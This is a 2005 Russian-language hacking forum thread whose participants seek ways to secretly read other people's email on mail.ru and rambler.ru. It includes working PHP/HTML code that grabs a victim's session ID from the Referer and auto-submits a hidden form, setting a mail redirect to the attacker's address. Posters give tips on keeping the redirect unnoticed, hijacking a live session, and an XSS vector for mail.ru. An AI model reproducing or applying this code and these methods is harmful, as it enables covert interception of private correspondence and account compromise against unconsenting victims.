Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   чтение почты на mail.ru и rambler.ru (https://forum.antichat.xyz/showthread.php?t=6080)

4e/\ 16.04.2005 13:42
чтение почты на mail.ru и rambler.ru
 
Что то раньше катил метод про переадресацию на другой ящик с ящика рамблера щас это походу прикрыли может можно ещё как то сделать так?
И ещё как на mail.ru переадресацию сделать?
Всем заранее спасибо.

Майор 16.04.2005 19:03
на рамблере принцип ослался тотже

4e/\ 16.04.2005 19:12
Майор объясни пожалуйсто что надо залить на сайт какой html код? Чтобы потом через тег img всё сработало напиши код html заранее спасибо.

Майор 16.04.2005 23:57
PHP код:
<?
$nomer=strpos("$HTTP_REFERER","Session/")+8;
$id=substr("$HTTP_REFERER","$nomer",36);
echo "
<html><FORM name='forma' ACTION='http://mail.rambler.ru/Session/{$id}/Rules.wssp' method='post' enctype='multipart/form-data'>
<INPUT type='hidden' name='FormCharset' value='windows-1251'>
<INPUT TYPE='checkbox' NAME='Redirect' VALUE='1' class='box' CHECKED>
<TEXTAREA style='width:0%;' NAME='RedirectText' ROWS='0' COLS='0'>TVOE_MILO</TEXTAREA>
<INPUT TYPE='hidden' NAME='RedirKeep' VALUE='1' class='box' CHECKED>
<INPUT TYPE='hidden' NAME='RedirHuman' VALUE='0' class='box'>
<INPUT TYPE='hidden' NAME='KeepToAndCc' VALUE='1' class='box' CHECKED>
<INPUT type='hidden' name='Update' VALUE='1' class='box' CHECKED>
</form>
<script LANGUAGE=javascript>
document.forma.submit();
</SCRIPT> ";
?>
Вот как-то так :)
PS причем эту страничку придётся запихнуть в iframe

4e/\ 17.04.2005 10:04
Майор значит вон тот код там надо своё мыло вписать которое на рамблере потом всё это сохранить в .php потом загрузить на сайт а какое письмо надо писать раньше же <img> работал <iframe src="adres.php"></iframe> или как? Объясни пожалуйсто

iSLa4 17.04.2005 12:21
А про майл.ру есть?

Майор 17.04.2005 12:33
Цитата:
Сообщение от 4e/\
Майор значит вон тот код там надо своё мыло вписать которое на рамблере потом всё это сохранить в .php потом загрузить на сайт а какое письмо надо писать раньше же <img> работал <iframe src="adres.php"></iframe> или как? Объясни пожалуйсто
найди там xss и зделай как здесь в примере с mail.ru
http://antichat.ru/txt/hmail/

4e/\ 17.04.2005 15:00
Цитата:
Сообщение от iSLa4
А про майл.ру есть?
А ты уже понял как на рамблер.ру читать?
Майор а можешь если не трудно видео записать всё делал как ты написал но не выходит нифига. Напиши пожалуйсто видео. На главную выложите как напишите пожалуйсто очень надо.

Master Of Decption 17.04.2005 16:41
4e и Майор
На mail.ru пересылку можно в фильтра задать.

Майор 17.04.2005 19:11
Цитата:
Сообщение от 4e/\
А ты уже понял как на рамблер.ру читать?
Майор а можешь если не трудно видео записать всё делал как ты написал но не выходит нифига. Напиши пожалуйсто видео. На главную выложите как напишите пожалуйсто очень надо.
да, там подругому малёк id придётся получить, потом посмотрю когда время будет
Цитата:
4e и Майор
На mail.ru пересылку можно в фильтра задать.
тогда жертва не будет получать письма, что окажется подозрительно, конешно можно отсылать жертве копии специальным скриптом, но мне кажется это неоправдано сложновато будет...

4e/\ 17.04.2005 19:22
Майор ок посмотришь напишешь сюда или сделай видео если не трудно.
Цитата:
Сообщение от Майор
тогда жертва не будет получать письма, что окажется подозрительно, конешно можно отсылать жертве копии специальным скриптом, но мне кажется это неоправдано сложновато будет...
А на майл.ру как сделать чтобы переадресация шла с ящика майл на мой ящик а на тот ящик ничего не приходило? Напиши код пожалуйсто

Master Of Decption 17.04.2005 20:57
Цитата:
Сообщение от Майор
тогда жертва не будет получать письма, что окажется подозрительно, конешно можно отсылать жертве копии специальным скриптом, но мне кажется это неоправдано сложновато будет...
Ты ошибаешься :)
Там есть галочка оставлять копии в папке такой-то, посмотри настройку фильтра пересылки.

Майор 17.04.2005 22:02
Master Of Decption
Точно :)
PS смотрел меню давно и мельком

Цитата:
А ты уже понял как на рамблер.ру читать?
Майор а можешь если не трудно видео записать всё делал как ты написал но не выходит нифига. Напиши пожалуйсто видео. На главную выложите как напишите пожалуйсто очень надо.
что и xss нашёл :) ?
там видимо фильтры нормальные поставили и не одна старая xss не работает ...

Xeeper 22.05.2005 16:12
Господа, большая просьба сообщить о действующих способах на сегодняшний день (на Rambler.ru).
Если паблика не хотите, можно в ПМ. Я не работаю на Rambler ( это можно легко проверить с большой вероятностью), мне просто нужно хотяб поиметь возможность просматривать письма другого ящика (пароль узнавать не обязательно)

Xeeper 26.05.2005 23:10
Мож кто-нить чё-нить ответит ? :d

JazzzSummerMan 27.05.2005 08:05
Xeeper
если по-простому, ты можешь общаться с человеком в инете, и попросить его проверить свой ящик на рамблере, и ПОКА ОН В ПОЧТЕ быстро воспользоваться его сессией. Подробно расписывать лишний раз нет смысла, тут много было написано

Xeeper 27.05.2005 23:50
Я как раз и имею ввиду те способы о которых тут было много написанно. Работают ли они на сегодняшний день или все дыры уже прикрыты ? и остаётся тока соц.инженерия ?

Ar3s 30.05.2005 12:13
Наскока я знаю - все прикрыто. Мне вот тоже очень нужно. Пробовал все. МИМО!

JazzzSummerMan 30.05.2005 12:19
Цитата:
Сообщение от Майор
что и xss нашёл :) ?
там видимо фильтры нормальные поставили и не одна старая xss не работает ...
Там и так фильтры нормальные стояли. А которую мы нашли (не помню уже какую точно), тоже теперь не работает?

Майор 30.05.2005 16:40
проблема в том что тама все xss прекрыли, атребут src во всех тегах фильтруется очень чётко

Ar3s 30.05.2005 17:58
А нового ничего не копали? Если есть эксперты в этом деле...
Можно было бы объединить усилия и в несколько рук разгрести еще чего...

JazzzSummerMan 01.06.2005 17:05
хехе
ну для начала объявляется типа конкурс на нахождение Xss в письмах) Интересно, найдет кто-нибудь? Мне кажется решаемый вопрос-то в принципе)

Xattab 01.06.2005 19:29
Всем привет!
Цитата:
Сообщение от JazzzSummerMan
хехе
ну для начала объявляется типа конкурс на нахождение Xss в письмах) Интересно, найдет кто-нибудь? Мне кажется решаемый вопрос-то в принципе)
конкурс? А какой приз?
Я нашел рабочий XSS на mail.ru в атрибуте image src=

JazzzSummerMan 01.06.2005 20:03
Цитата:
Сообщение от Xattab
Всем привет!

конкурс? А какой приз?
Я нашел рабочий XSS на mail.ru в атрибуте image src=
я имел ввиду "типа конкурса", внутри раздела емэйл и в рамках обсуждения рамблера)
приза наверна никакого, кроме признания среди вас, специалистов
Кстати на мэйл.ру не совсем актуально. Раз уж тема о чтении чужих писем, то на мэйле скрипт не нужн для организации пересылки, там все через простой запрос делается. А вот на рамблере нужен, и тем интереснее, что там все шито-крыто, защищено от XSS, поэтому повторяюсь:
все ищем на рамблере способ запустить JavaScript внутри письма)

RuSSo 01.06.2005 20:46
Нормальный человек нашедший уязвимость java не будет кидать е сюда.
Какой нить идиот сделат видео и кинет его сюдам ламерам в тот же дегь ету дыру приктоют.

RuSSo 01.06.2005 20:49
Такие уязвимости либо испоьзуют в своих целях либо продают за деньги.
Но никак не кидают на этот форум,где 98 % сидит ламеров, которые ничего кроме как подставить по аналогии не могут.

Xattab 01.06.2005 22:48
Цитата:
Сообщение от JazzzSummerMan
Кстати на мэйл.ру не совсем актуально. Раз уж тема о чтении чужих писем, то на мэйле скрипт не нужн для организации пересылки, там все через простой запрос делается.
На скока я знаю простой запрос для прописки фильтра уже не работает на майле больше месяца. Если знаешь, как правильно выглядит этот запрос, плиз запости здесь.

Майор 01.06.2005 23:14
Цитата:
Сообщение от Xattab
На скока я знаю простой запрос для прописки фильтра уже не работает на майле больше месяца. Если знаешь, как правильно выглядит этот запрос, плиз запости здесь.
нынче система проверяет REFERER

JazzzSummerMan 01.06.2005 23:33
надо писать скрипт который отправляет заголовок

Ar3s 03.06.2005 14:54
Я только не понял есть всетаки Xss или нет?
И кто возьмется написать скрапт?

Майор 03.06.2005 16:54
mail.ru
<image src=JaVaScRiP:alert()>

RuSSo 03.06.2005 17:13
Майор Молодца :)))))
Ты тока хорошо подумал ?

Майор 03.06.2005 17:24
это общеизвестная xss и это не секрет

JazzzSummerMan 03.06.2005 17:35
хехе, Майор непонятно,
имеется ввиду что на рамблере что ли работает это?

RuSSo 03.06.2005 17:42
Я имел в виду нечто другое. ))

Xattab 03.06.2005 21:18
Цитата:
Сообщение от Майор
mail.ru
<image src=JaVaScRiP:alert()>
На майле работает, а на рамблере нет :(
Тока ошибся на один знак JaVaScRiPt

Devochka 06.06.2005 00:02
мне очень нужно узнать пороль к мылу , с чего начинать?

Майор 06.06.2005 00:40
Цитата:
Сообщение от Devochka
мне очень нужно узнать пороль к мылу , с чего начинать?
прочесть послнедние 5 тем в этом разделе ;)

Ejivica 08.06.2005 12:59
угу я уже тут столько прочла, что мне сниться этот форум начал. И сделала один большой вывод... ничего у меня самой не получиться... потому как я ничего не умею, а извесные шаблоны уже не работают, вот сижу и гадаю что бы придумать...

Rebz 08.06.2005 13:26
Сницца - это хорошо. =))
Да рановато пока новичком вникать в суть Xss, если они не знают что это такое! Всё просто - без знаний ничего не будет. Поройтесь в поисковике, узнайте больше про Xss, если вам это интересно, конечно..


Время: 23:22
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице